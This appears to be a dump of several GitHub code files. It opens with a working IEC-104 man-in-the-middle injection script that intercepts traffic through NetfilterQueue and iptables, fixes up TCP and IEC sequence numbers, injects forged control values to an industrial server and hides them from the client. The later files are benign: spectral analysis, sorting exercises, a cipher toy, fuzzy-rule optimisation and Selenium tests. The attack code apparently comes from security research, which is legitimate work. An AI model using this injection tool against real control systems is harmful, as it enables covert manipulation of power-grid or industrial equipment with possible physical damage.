import NetfilterQueue\nfrom kamene.layers.inet import *\nfrom kamene.all import *\nimport warnings\nimport threading\nfrom utils.utils import *\n\nwarnings.simplefilter(\"ignore\")\n\n\nclass IEC104MITM:\n def __init__(self, client_ip: str, server_ip: str, server_port: int):\n self.client_ip = client_ip\n self.server_ip = server_ip\n self.server_port = server_port\n self.client_port = None\n\n self.injected_packet_sent = False\n self.original_ioa_values = {}\n self.faked_ioa_values = {}\n\n self.tcp_offset = 0\n self.iec_offset = 0\n\n self.client_tcp_seq_next, self.client_tcp_ack, self.client_iec_tx, self.client_iec_rx = None, None, None, None\n\n def extract_tcp_and_iec_values(self, packet: IP) -> (int, int, int, int, int):\n tcp_seq, tcp_seq_next, tcp_ack = extract_tcp_details(packet)\n iec_tx, iec_rx = None, None\n if extract_iec_details(packet) is not None:\n iec_tx, iec_rx = extract_iec_details(packet)\n if packet['IP'].src == self.client_ip:\n self.client_port = packet['TCP'].sport\n self.client_tcp_seq_next = tcp_seq_next\n self.client_tcp_ack = tcp_ack\n if iec_tx is not None and iec_rx is not None:\n self.client_iec_tx = iec_tx\n self.client_iec_rx = iec_rx\n\n if extract_ioa_values(packet) is not None:\n ioa, value = extract_ioa_values(packet)\n self.original_ioa_values[ioa] = value\n return tcp_seq, tcp_ack, iec_tx, iec_rx\n\n def update_and_send(self, packet: IP, tcp_seq: int, tcp_ack: int, iec_tx: int, iec_rx: int):\n if packet['IP'].src == self.client_ip:\n tcp_seq, tcp_ack = tcp_seq + self.tcp_offset, tcp_ack + self.tcp_offset\n if iec_tx is not None and iec_rx is not None:\n iec_tx, iec_rx = iec_tx + self.iec_offset, iec_rx + self.iec_offset\n elif packet['IP'].src == self.server_ip:\n tcp_seq, tcp_ack = tcp_seq - self.tcp_offset, tcp_ack - self.tcp_offset\n if iec_tx is not None and iec_rx is not None:\n iec_tx, iec_rx = iec_tx - self.iec_offset, iec_rx - self.iec_offset\n\n packet = update_tcp_header(packet, tcp_seq, tcp_ack)\n\n if iec_tx is not None and iec_rx is not None:\n packet = update_iec_apci(packet, iec_tx, iec_rx)\n if packet['IP'].src == self.server_ip:\n packet = update_iec_asdu(packet, self.original_ioa_values)\n elif packet['IP'].src == self.client_ip:\n packet = update_iec_asdu(packet, self.faked_ioa_values)\n\n packet = update_checksums(packet)\n send(packet, verbose=False)\n\n def packet_handler(self, packet: netfilterqueue.Packet) -> None:\n smart_packet = IP(packet.get_payload())\n if smart_packet['IP'].src in [self.client_ip, self.server_ip] and \\\n smart_packet['IP'].dst in [self.client_ip, self.server_ip] and \\\n self.server_port in [smart_packet['TCP'].sport, smart_packet['TCP'].dport]:\n if self.injected_packet_sent:\n self.injected_packet_sent = False\n self.forge_ack()\n else:\n tcp_seq, tcp_ack, iec_tx, iec_rx = self.extract_tcp_and_iec_values(smart_packet)\n self.update_and_send(smart_packet, tcp_seq, tcp_ack, iec_tx, iec_rx)\n packet.drop()\n else:\n packet.accept()\n\n def inject_packet(self, ioa, value):\n if None in [self.client_tcp_seq_next, self.client_tcp_ack, self.client_iec_rx, self.client_iec_tx]:\n typer.secho(\"[-] Some values are still None, try again later!\", fg=typer.colors.RED)\n return\n\n self.iec_offset += 1\n tx = self.client_iec_tx + self.iec_offset\n rx = self.client_iec_rx + self.iec_offset\n payload = build_iec_packet(tx, rx, ioa, value)\n\n ip = IP(src=self.client_ip, dst=self.server_ip)\n tcp = TCP(dport=self.server_port, sport=self.client_port)\n tcp.seq = self.client_tcp_seq_next + self.tcp_offset\n tcp.ack = self.client_tcp_ack\n tcp.payload = payload\n tcp.flags = 24\n tcp.window = 502\n packet = ip / tcp\n update_checksums(packet)\n\n self.tcp_offset += len(payload)\n self.faked_ioa_values[ioa] = value\n self.injected_packet_sent = True\n send(packet, verbose=False)\n\n def forge_ack(self):\n ip = IP(src=self.client_ip, dst=self.server_ip)\n tcp = TCP(dport=self.server_port, sport=self.client_port)\n tcp.seq = self.client_tcp_seq_next + self.tcp_offset\n tcp.ack = self.client_tcp_ack + self.tcp_offset\n tcp.flags = 16\n tcp.window = 502\n packet = ip / tcp\n update_checksums(packet)\n send(packet, verbose=False)\n\n def read_command(self):\n while True:\n try:\n command = input(\"Command: \")\n if command.split(\":\") != 2:\n ioa = int(command.split(\":\")[0])\n value = int(command.split(\":\")[1])\n self.inject_packet(ioa, value)\n except ValueError:\n pass\n\n def start(self, queue_id=1):\n net_filter_queue = NetfilterQueue()\n net_filter_queue.bind(queue_id, self.packet_handler)\n try:\n net_filter_queue.run()\n except KeyboardInterrupt:\n print('')\n\n net_filter_queue.unbind()\n\n\ndef main(\n client_ip: str = typer.Argument(..., help=\"IP address of the IEC client\"),\n server_ip: str = typer.Argument(..., help=\"IP address of the IEC server\"),\n server_port: int = typer.Option(2404, help=\"TCP port number of the IEC server.\")\n):\n if not is_ipv4_address(data=client_ip) or not is_ipv4_address(data=server_ip):\n typer.secho(\"[-] Invalid client/server IP provided.\", fg=typer.colors.RED)\n exit(1)\n if not is_tcp_port(data=server_port):\n typer.secho(\"[-] Invalid server port provided.\", fg=typer.colors.RED)\n exit(1)\n try:\n typer.secho(\"[*] Trying to setup iptables rules.\", fg=typer.colors.YELLOW)\n setup_iptables(client_ip=client_ip, server_ip=server_ip, server_port=server_port)\n typer.secho(\"[+] Rules added!\", fg=typer.colors.GREEN)\n except:\n typer.secho(\"[-] Something went wrong during rule manipulation!.\", fg=typer.colors.RED)\n exit(1)\n\n mitm = IEC104MITM(client_ip, server_ip, server_port)\n thread1 = threading.Thread(target=mitm.start)\n thread1.daemon = True\n thread1.start()\n mitm.read_command()\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","repo_name":"CrySyS/IEC-104-Attacks","sub_path":"Attacker/attacks/a5_injection.py","file_name":"a5_injection.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70514710864","text":"import tkinter as tk\nimport pybaselines as pybase\nimport numpy as np\nimport sif_parser as sif\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom PIL import Image, ImageFile\n\n\nfrom matplotlib.widgets import SpanSelector\nfrom matplotlib.backend_bases import MouseButton\nfrom tkinter import filedialog\n\n\n\n\nxmin = 2000\nxmax = 3900\n\nnormalize_window = [.35, 1]\n\n\n\ndef get_multi_data():\n root = tk.Tk()\n root.withdraw()\n\n datasource = pd.DataFrame(columns=[\"Capture Info\",\"X Data\",\"Y Data\", \"Modified Y Data\"])\n datasource['Capture Info'] = datasource['Capture Info'].astype(object)\n datasource['X Data'] = datasource['X Data'].astype(object)\n datasource['Y Data'] = datasource['Y Data'].astype(object)\n datasource['Modified Y Data'] = datasource['Modified Y Data'].astype(object)\n file_paths = filedialog.askopenfilenames(filetypes=[(\"Sif Files\", \"*.sif\")])\n for filecount in range(len(file_paths)):\n tempdata, tempinfo = sif.utils.parse(file_paths[filecount])\n datasource.loc[filecount] = [tempinfo, tempdata[:, 0], tempdata[:, 1], tempdata[:, 1]]\n return datasource\n\ndef get_indices(data_x, xmin, xmax):\n indmax = np.searchsorted(data_x, xmax, side = 'right')\n indmin = np.searchsorted(data_x, xmin, side = 'left')\n return indmin, indmax\n\ndef truncate(data, indmin, indmax):\n return data[indmin:indmax]\n\ndef whole_normalize(data):\n return np.divide(data, np.sum(data))\n\ndef window_max_normalize(x_data, data_range):\n indmin = int(data_range[0] * x_data.size)\n indmax = int(data_range[1] * x_data.size)\n window = x_data[indmin:indmax]\n max_val = window.max()\n return x_data / max_val\n\n\ndef wavelength_to_raman(wavelengths, ExcitationWavelength):\n return 10_000_000 / ExcitationWavelength - 10_000_000 / wavelengths\n\ndef array_row_intersection(a,b):\n tmp=np.prod(np.swapaxes(a[:,:,None],1,2)==b,axis=2)\n return a[np.sum(np.cumsum(tmp,axis=0)*tmp==1,axis=1).astype(bool)]\n\ndef on_key_press(event):\n global input_key\n input_key = event.key\n if input_key == 'enter':\n plt.close()\n\ndef on_mouse_click(event):\n global input_click\n input_click = event.button\n if input_click is MouseButton.LEFT:\n ax.set_title(\"Remove Areas of Signal\\n Press Enter to Finish\")\n fig.canvas.draw_idle()\n if input_click is MouseButton.RIGHT:\n ax.set_title(\"Add Areas of Background\\n Press Enter to Finish\")\n fig.canvas.draw_idle()\n\ndef PolyCoefficients(x, coeffs):\n o = len(coeffs)\n y = 0\n for i in range(o):\n y += coeffs[i]*x**i\n return y\n\ndef clippable(array, include_x=True):\n if include_x:\n tmp = pd.DataFrame(array)\n else:\n tmp = pd.DataFrame(array[:, 1])\n tmp.to_clipboard(index=False,header=False)\n\ndef onselect(vmin, vmax):\n if input_click is MouseButton.LEFT:\n indmin = np.searchsorted(specs.x, vmin, 'left')\n indmax = np.searchsorted(specs.x, vmax, 'right')\n try:\n specs.signal = np.unique(np.vstack((specs.signal, specs.combdata[indmin:indmax+1, :])), axis=0)\n except ValueError:\n specs.signal = specs.combdata[indmin:indmax+1]\n specs.noise = np.array(list(set(map(tuple, specs.noise)).difference(set(map(tuple, specs.combdata[indmin:indmax+1])))))\n ax.clear()\n if np.size(specs.signal) > 0:\n specs.signal = specs.signal[specs.signal[:, 0].argsort()]\n ax.plot(specs.signal[:,0], specs.signal[:, 1], '.', color='red')\n if np.size(specs.noise) > 0:\n specs.noise = specs.noise[specs.noise[:, 0].argsort()]\n ax.plot(specs.noise[:,0], specs.noise[:, 1], '.', color='blue')\n ax.set_title(\"Remove Areas of Signal\\n Press Enter to Finish\")\n fig.canvas.draw_idle()\n if input_click is MouseButton.RIGHT:\n indmin = np.searchsorted(specs.x, vmin, 'left')\n indmax = np.searchsorted(specs.x, vmax, 'right')\n try:\n specs.noise = np.unique(np.vstack((specs.noise, specs.combdata[indmin:indmax+1, :])), axis=0)\n except ValueError:\n specs.noise = specs.combdata[indmin:indmax+1]\n specs.signal = np.array(list(set(map(tuple, specs.signal)).difference(set(map(tuple, specs.combdata[indmin:indmax+1])))))\n ax.clear()\n if np.size(specs.signal)> 0:\n signal = specs.signal[specs.signal[:, 0].argsort()]\n ax.plot(specs.signal[:,0], specs.signal[:, 1], '.', color='red')\n if np.size(specs.noise) > 0:\n specs.noise = specs.noise[specs.noise[:, 0].argsort()]\n ax.plot(specs.noise[:,0], specs.noise[:, 1], '.', color='blue')\n ax.set_title(\"Add Areas of Background\\n Press Enter to Finish\")\n fig.canvas.draw_idle()\n\n\nclass Specs:\n def __init__(self, x_, y_, signal_, noise_, combdata_):\n self.x = x_\n self.y = y_\n self.signal = signal_\n self.noise = noise_\n self.combdata = combdata_\n\n\ndata = get_multi_data()\n\nfor row in data.index:\n data['X Data'][row] = wavelength_to_raman(data['X Data'][row], data['Capture Info'][row]['RamanExWavelength'])\n indmin, indmax = get_indices(data['X Data'][row], xmin, xmax)\n data['X Data'][row] = truncate(data['X Data'][row], indmin, indmax)\n data['Y Data'][row] = truncate(data['Y Data'][row], indmin, indmax)\n\n x = data['X Data'][row]\n y = data['Y Data'][row]\n combdata = np.vstack((x, y))\n combdata = combdata.transpose()\n signal = np.empty([0, 2])\n noise = combdata\n specs = Specs(x, y, signal, noise, combdata)\n \n\n fig, ax = plt.subplots(figsize = (12,8))\n ax.plot(x, y, '.', color='blue')\n ax.plot(signal[:, 0], signal[:, 1], '.', color = 'red')\n ax.set_title(\"Press Shift to Remove Signal Areas, Press + to Add Areas Back \\n Press Enter When Finished\")\n\n input_click = None\n input_key = None\n\n cid = fig.canvas.mpl_connect('key_press_event', on_key_press)\n plt.connect('button_press_event', on_mouse_click)\n span = SpanSelector(ax, onselect, 'horizontal', useblit=True, props=dict(facecolor='blue', alpha=0.25), snap_values = x)\n plt.show()\n fig.canvas.mpl_disconnect(cid)\n\n baseline_fitter = pybase.Baseline(specs.noise[:, 0], assume_sorted = True)\n\n cut_base, params = baseline_fitter.imodpoly(specs.noise[:, 1], poly_order = 3, return_coef = True)\n\n coeffs = params['coef']\n\n baseline_y = np.zeros(np.size(specs.x))\n\n baseline_y = PolyCoefficients(specs.x, coeffs)\n\n corrected_signal = specs.y - baseline_y\n\n # corrected_signal = whole_normalize(corrected_signal)\n corrected_signal = window_max_normalize(corrected_signal, normalize_window)\n\n x = specs.x\n y = specs.y\n noise = specs.noise\n signal = specs.signal\n\n data['Modified Y Data'][row] = corrected_signal\n\n ax.clear()\n\n plt.plot(x, PolyCoefficients(x, coeffs))\n plt.plot(x, y)\n\n fig2 = plt.figure(2)\n plt.plot(x, corrected_signal)\n plt.show()\n\n fig.canvas.mpl_disconnect(cid)\n fig2.canvas.mpl_disconnect(cid)\n corrected_data = (np.vstack((x, corrected_signal))).transpose()\n\naverage_x = data['X Data'][0]\naverage_y = np.empty(0)\n\nfor item in data['Modified Y Data']:\n if not average_y.size:\n average_y = item\n else:\n average_y = np.vstack((average_y, item))\nif average_y.ndim > 1:\n average_y = np.mean(average_y, axis = 0)\naverage_data = np.vstack((average_x, average_y))\n\ninclude_x = input('Include x axis data for clipboard? [y/n]: ')\nclippable(average_data.transpose(), include_x.lower() == 'y')\n\nfor row in data.index:\n print(str(data['Capture Info'][row]['OriginalFilename']))\n\nplt.plot(average_data[0, :], average_data[1,:])\nplt.show()\n","repo_name":"dawson-baxter/SpectralSolver","sub_path":"spectralsolver.py","file_name":"spectralsolver.py","file_ext":"py","file_size_in_byte":7660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21012145230","text":"n = int(input())\narray = []\n\nfor i in range(n):\n\tx, y = input().split()\n\tarray.append((x, int(y)))\n\narray.sort(key = lambda x : x[1])\n\nfor i in array:\n\tprint(i[0], end = ' ')\n\n\n\n\n\n","repo_name":"LeeJin0527/algorithm","sub_path":"이코테/정렬/문제풀이/성적이 낮은 순서로 학생 출력하기.py","file_name":"성적이 낮은 순서로 학생 출력하기.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"33494684187","text":"from galaxy import config, tools, jobs, web\nimport galaxy.model.mapping\n\nclass UniverseApplication( object ):\n \"\"\"Encapsulates the state of a Universe application\"\"\"\n def __init__( self, **kwargs ):\n # Read config file and check for errors\n self.config = config.Configuration( **kwargs )\n self.config.check()\n config.configure_logging( self.config )\n # Connect up the object model\n if self.config.database_connection:\n self.model = galaxy.model.mapping.init( self.config.file_path,\n self.config.database_connection,\n create_tables = True )\n else:\n self.model = galaxy.model.mapping.init( self.config.file_path,\n \"sqlite://%s?isolation_level=IMMEDIATE\" % self.config.database,\n create_tables = True )\n # Initialize the tools\n self.toolbox = tools.ToolBox( self.config.tool_config, self.config.tool_path )\n # Start the job queue\n self.job_queue = jobs.JobQueue( self.config.job_queue_workers, self )\n self.heartbeat = None\n # Start the heartbeat process if configured and available\n if self.config.use_heartbeat:\n from galaxy import heartbeat\n if heartbeat.Heartbeat:\n self.heartbeat = heartbeat.Heartbeat()\n self.heartbeat.start()\n def shutdown( self ):\n self.job_queue.shutdown()\n if self.heartbeat:\n self.heartbeat.shutdown()","repo_name":"jmchilton/galaxy-central","sub_path":"galaxy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"32678196469","text":"\nimport logging\nfrom datetime import datetime\n\nfrom covis_db import db,hosts,remote,misc\n\ndef add_raw_entry_for_wasabi( args, run ):\n\n if run.datetime < datetime(2018,1,1):\n return True\n\n logging.info(\" Checking for Wasabi raw for basename %s\" % run.basename)\n\n ## Check for raw\n if run.find_raw(\"WASABI\"):\n logging.info(\" Has raw entry for WASABI\")\n return True\n\n if args.fix:\n s3_file = misc.make_pathname( run.basename, suffix=\".tar.gz\" )\n logging.info(\" Checking Wasabi for %s\" % s3_file)\n\n try:\n accessor = remote.WasabiAccessor( path=s3_file )\n\n filesize = accessor.filesize()\n logging.info(\" File %s on wasabi is %d\" % (run.basename, filesize) )\n\n if not run.add_raw(\"WASABI\", s3_file, filesize=filesize, suffix=\".tar.gz\"):\n logging.info(\" Unable to add raw\")\n\n logging.info(\" ... done adding\")\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n logging.warning(message)\n return False\n\n return True\n","repo_name":"COVIS-Sonar/covis-worker","sub_path":"apps/db_validators/add_raw_entry_for_wasabi.py","file_name":"add_raw_entry_for_wasabi.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35153876034","text":"# The captcha requires you to review a sequence of digits (your puzzle input) and find the sum of all digits that match the next digit in the list. The list is circular, so the digit after the last digit is the first digit in the list.\n\nseq = input();\nlength = len(seq);\nresult = 0;\ntemp = -1;\nfor i in range(length+1):\n\tif(temp >= 0 and temp == int(seq[i%length])):\n\t\tresult += temp;\n\ttemp = int(seq[i%length]);\nprint(result);","repo_name":"tterb/advent-of-code","sub_path":"2017/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"38672132486","text":"import art\nfrom replit import clear\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n# cipher function\ndef cipher(text,shift,direction):\n output=''\n # if decode => shift = -shift\n if direction=='decode':\n shift *= -1\n for letter in text:\n if letter in alphabet:\n index_letter = alphabet.index(letter)\n shift_index = index_letter + shift #here shift is negative if decoding\n if shift_index < 0 or shift_index > 26:\n remainder_index= shift_index % 26\n output += alphabet[remainder_index]\n else:\n output += alphabet[shift_index]\n else:\n output += letter\n print(f\"the {direction}d text is {output} \")\n return output\n\n\n#start ciphering\nplaying=True\nencodedTextHistory =[]\ndecodedTextHistory =[]\n\nwhile playing:\n clear()\n print(art.logo)\n direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt or view to view history:\\n\").lower()\n\n if direction !='view': \n text = input(\"Type your message:\\n\").lower()\n shift = int(input(\"Type the shift number:\\n\"))\n\n output=cipher(text,shift,direction)\n save = input(f'Do you want to save the {direction}d text ?\\n press yes or y to save\\n')\n\n if save =='y' or save == 'yes':\n if direction =='encode':\n\n encodedTextHistory.append(output)\n else:\n decodedTextHistory.append(output)\n\n else:\n direction_of_history = input('Which history do you need to see ? \\n encoded or decoded\\n type e for encoded or d for decoded\\n')\n if direction_of_history =='e':\n for text in encodedTextHistory:\n print(text)\n else:\n for text in decodedTextHistory:\n print(text)\n \n playing_again= input('Press any key to quit, type y or yes to continue again. \\n').lower()\n if playing_again =='yes' or playing_again =='y':\n playing = True\n else:\n playing = False","repo_name":"SamroodAli/python-pro-day-8-caesar-cipher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72235426703","text":"import numpy as np\nfrom deap import creator, base, tools, algorithms\nfrom sklearn.metrics import precision_score\nfrom skfuzzy import control as ctrl\n\n# Number of rules in an individual\nIND_SIZE = 15\n\n\nclass RuleSetOptimizer:\n def __init__(self, fvt_generator, input_universes, X_val_dict, y_val, max_occupancy, n_clusters=3, pop_size=50,\n cxpb=0.5, mutpb=0.2, ngen=100):\n self._input_universes = input_universes\n self.X_val_dict = X_val_dict\n self.y_val = y_val\n self.max_occupancy = max_occupancy\n self.n_clusters = n_clusters\n self.pop_size = pop_size\n self.cxpb = cxpb\n self.mutpb = mutpb\n self.ngen = ngen\n\n # Create the fuzzy control variables\n self.inputs = fvt_generator.generate_antecedents()\n self.output = fvt_generator.generate_consequent()\n\n # Setup DEAP\n creator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,))\n creator.create(\"Individual\", list, fitness=creator.FitnessMin)\n\n self.toolbox = base.Toolbox()\n\n # Generate a random feature cluster number\n self.toolbox.register(\"a_cluster\", np.random.randint, 0, self.n_clusters)\n\n # Generate a random consequent cluster number\n self.toolbox.register(\"c_cluster\", np.random.randint, 0, self.n_clusters)\n\n # Generate a random rule\n def generate_rule():\n # Initialize rule dict with features as keys and clusters as values\n rule = {feature: 'cluster' + str(self.toolbox.a_cluster() + 1) for feature in self.inputs.keys()}\n\n # Assign 'Occupancy' a different cluster\n rule['Occupancy'] = 'cluster' + str(self.toolbox.c_cluster() + 1)\n\n # Generate condition using bitwise AND (&) operator between each feature in the rule\n condition = None\n for feature in self.inputs.keys():\n if condition is None:\n condition = self.inputs[feature][rule[feature]]\n else:\n condition = condition & self.inputs[feature][rule[feature]]\n\n # Create a new rule using the generated condition and the output for 'Occupancy'\n new_rule = ctrl.Rule(condition, self.output[rule['Occupancy']])\n\n return new_rule\n\n # Generate an individual\n \"\"\"def generate_individual():\n rules = []\n for _ in range(IND_SIZE):\n rules.append(generate_rule())\n return generate_controller(rules)\"\"\"\n\n # Register an individual\n # self.toolbox.register(\"individual\", creator.Individual, generate_individual)\n # self.toolbox.register(\"individual\", tools.initRepeat, creator.Individual, generate_rule, n=n_rules)\n self.toolbox.register(\"individual\", tools.initRepeat, creator.Individual, generate_rule, n=IND_SIZE)\n\n # Register a population\n # self.toolbox.register(\"population\", tools.initRepeat, list, self.toolbox.individual)\n # self.toolbox.register(\"population\", tools.initRepeat, list, generate_controller(self.toolbox.individual()))\n self.toolbox.register(\"population\", tools.initRepeat, list, self.toolbox.individual)\n\n # Register the evaluation function\n self.toolbox.register(\"evaluate\", self.evaluate)\n\n # Swaps half the rules between two controllers.\n def cxController(ind1, ind2):\n\n # Swap half the rules\n temp = ind1[len(ind1) // 2:]\n ind1[len(ind1) // 2:] = ind2[len(ind2) // 2:]\n ind2[len(ind2) // 2:] = temp\n\n return ind1, ind2\n\n self.toolbox.register(\"mate\", cxController)\n\n # Mutates a controller by changing one rule at random.\n def mutController(individual):\n individual[np.random.randint(0, len(individual))] = generate_rule()\n return individual,\n\n self.toolbox.register(\"mutate\", mutController)\n\n self.toolbox.register(\"select\", tools.selTournament, tournsize=3)\n\n # Generate a controller with random rules\n def generate_controller(self, rules):\n system = ctrl.ControlSystem()\n # I have setted the indices form -1 due to a bug in skfuzzy\n # it lost always the last rule\n for i in range(-1, len(rules)):\n system.addrule(rules[i])\n simulation = ctrl.ControlSystemSimulation(system)\n\n return simulation\n\n def evaluate(self, individual):\n\n simulation = self.generate_controller(individual)\n\n y_pred = []\n for record in self.X_val_dict:\n\n # Input values into the controller\n for feature in record:\n simulation.input[feature] = record[feature]\n\n # Compute the result\n simulation.compute()\n\n # Get output and append to y_pred\n y_pred.append(simulation.output['Occupancy'] * self.max_occupancy / 100)\n\n threshold = 0.5\n y_true_binary = [1 if y > threshold else 0 for y in self.y_val]\n y_pred_binary = [1 if y > threshold else 0 for y in y_pred]\n\n precision = precision_score(y_true_binary, y_pred_binary)\n print('Precision: ', precision)\n return precision,\n\n def optimize(self):\n population = self.toolbox.population(n=self.pop_size)\n\n # Calculate fitness for each individual in the population\n fitnesses = map(self.toolbox.evaluate, population)\n for ind, fit in zip(population, fitnesses):\n ind.fitness.values = fit\n\n result = algorithms.eaSimple(population, self.toolbox, cxpb=self.cxpb, mutpb=self.mutpb, ngen=self.ngen)\n best_individual = tools.selBest(population, k=1)[0]\n\n return best_individual\n","repo_name":"GiorgioPaoletti-Unicam/membership-function-occupancy-estimation","sub_path":"RuleSetOptimizer.py","file_name":"RuleSetOptimizer.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27815943403","text":"def Sort(arr):\n \"\"\"Selection sort algorithm.\"\"\"\n for i in range(len(arr)-1):\n min = i\n\n for j in range(i+1, len(arr)):\n if arr[j] < arr[min]:\n min = j\n arr[i], arr[min] = arr[min], arr[i]\n\n\nn = int(input())\nnumbers = list(map(int, input().split()))\n\nSort(numbers)\n\nfor index in range(len(numbers)):\n print(str(numbers[index])\n if index == len(numbers)-1\n else str(numbers[index]) + \" \",\n end='')\n ","repo_name":"jeffreytzeng/Algorithm","sub_path":"selection sort/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26609362794","text":"'''\nvaccine site array object that has a wait time array \n=> map to average the wait time.and add to object \n=> filter out the sites with that have average wait time above a certain amount\n'''\n\nwait_time = [20, 10, 15, 7, 30, 45, 60, 5, 4]\nwait_time2 = ['20', '10', '15', '7', '30', '45', '60', '5', '4']\nclinic = [\n 'Hallingford', 'Washington', 'Griff Hospital', 'Masonford', 'Jacksonville',\n 'Beurotown', 'Belltown', 'Lickenville', 'Whatsitburg'\n ]\n\nstring_wait = str(wait_time)\n\nprint(\"String Test\", string_wait)\n# ==========Map========== #\n\nresult1 = map(lambda x, y: x + \" minutes at \" + y, wait_time2, clinic)\nprint(\"Result 1\", list(result1))\n\n# def combine_array(arr1, arr2):\n \n\n# ==========Filter========== #\n\n# def too_long(time):\n# if time > 30:\n# return \"Wait time longer than 30 minutes\"\n# else: \n# return \"Short wait time\"\n\ndef short_time(time):\n if time < 30:\n return True\n else: \n return False\n\ndef long_time(time):\n if time >= 30:\n return True\n else: \n return False\n\nlong_wait = list(filter(long_time, wait_time))\nshort_wait = list(filter(short_time, wait_time))\n\n# print(\"Long Wait Time\", long_wait)\n# print(\"Short Wait Time\", short_wait)","repo_name":"kawaharm/scenarios_python","sub_path":"justin.py","file_name":"justin.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2693517064","text":"# 출처 : https://www.acmicpc.net/problem/1946\nt = int(input())\nfor _ in range(t):\n n = int(input())\n answer = 0\n b = 100001\n\n scores = [list(map(int, input().split())) for i in range(n)]\n # 첫번째 면접 결과 순위로 정렬\n scores.sort(key=lambda x: (x[0]))\n\n for i in range(n):\n # 첫번째 순위로 정렬해놨으므로 두번째 면접의 결과만 비교해주면 됨\n if(scores[i][1] < b):\n b = scores[i][1]\n answer += 1\n\n print(answer)\n","repo_name":"Ssook/Algorithm","sub_path":"boj/1946.py","file_name":"1946.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36703625456","text":"import unittest\nimport time\nfrom selenium import webdriver\nimport logging\nfrom TestWebsitelogin.Pages.login_page import LoginPage\nfrom TestWebsitelogin.Pages.myaccount_page import MyAccountPage\nfrom TestWebsitelogin.Pages.add_items_to_cart_from_search_page import AddItemsToCartPage\nfrom TestWebsitelogin.Pages.cart_page import MyCartPage\nfrom config_login import ke\n\nclass TestAutomationPracticeSearchAddtocart(unittest.TestCase):\n @classmethod\n def setUp(cls):\n cls.driver = webdriver.Chrome(executable_path=\"/Applications/chromedriver\")\n cls.driver.maximize_window()\n cls.driver.implicitly_wait(5)\n\n @classmethod\n def tearDown(cls):\n cls.driver.quit()\n\n\n def test_search_addtocart(self):\n\n logging.basicConfig(\n format='%(levelname)s: %(asctime)s: %(message)s',\n filename='/Users/siriqa/PycharmProjects/pythonProject/TestWebsitelogin/Reports/loggingfile.py',\n level=logging.DEBUG)\n time.sleep(5)\n driver = self.driver\n driver.get(ke['url_login'])\n logging.info('Started LogIn')\n\n #logging in\n login = LoginPage(driver)\n login.enter_username(ke['email'])\n login.enter_password(ke['passwd'])\n login.click_submit()\n time.sleep(6)\n\n #searching item 1\n\n myaccount = MyAccountPage(driver)\n myaccount.search_item(ke['search1_top'])\n myaccount.search_submit()\n\n #Add to cart\n addtocart = AddItemsToCartPage(driver)\n addtocart.item_selection()\n #price_each_item = driver.find_element_by_id('our_price_display').text\n #quantity_each_item = driver.find_element_by_id(quantity_wanted).text\n time.sleep(5)\n\n addtocart.item_add_to_cart()\n logging.info('{} Item added to cart successfully'.format(ke['search1_top']))\n time.sleep(5)\n addtocart.continue_shopping()\n time.sleep(5)\n\n # searching item 2\n #myaccount = MyAccountPage(driver)\n driver.find_element_by_xpath('//*[@id=\"search_query_top\"]').clear()\n myaccount.search_item(ke['search2_top'])\n myaccount.search_submit()\n logging.info('search successful')\n\n # Add to cart\n #addtocart = AddItemsToCartPage(driver)\n addtocart.item_selection()\n time.sleep(5)\n addtocart.item_add_to_cart()\n time.sleep(5)\n total_price_afteradding_items = driver.find_element_by_xpath('//*[@id=\"layer_cart\"]/div[1]/div[2]/div[1]/span').text\n time.sleep(5)\n\n addtocart.continue_shopping()\n time.sleep(10)\n count_addcart = driver.find_element_by_xpath('//*[@id=\"header\"]/div[3]/div/div/div[3]/div/a/span[1]').text\n #print(count_addcart)\n time.sleep(5)\n logging.info('{} Item added to cart successfully'.format(ke['search2_top']))\n\n #cartpage Summary quantity,prices validation\n mycartsummary = MyCartPage(driver)\n mycartsummary.cart_click()\n time.sleep(5)\n price_total = driver.find_element_by_id('total_product').text\n count_cartpage = driver.find_element_by_id('summary_products_quantity').text\n count_cartpagesummary = count_cartpage.split()[0]\n\n\n #Assertions\n assert(count_addcart == count_cartpagesummary),'No. of items added to cart are not same in Cart Summary page'\n print(\"No. of items added to cart{0} are same in Cart Summary page{1}\".format(count_addcart,count_cartpagesummary))\n logging.info('Logging: Items quantity added is same in Cart Summary page')\n\n assert(total_price_afteradding_items == price_total),'Total item prices added are not same in Cart Summary page'\n print(\"Total price of items {0} is same as Total products price{1} in Cart summary page\".format(total_price_afteradding_items, price_total))\n 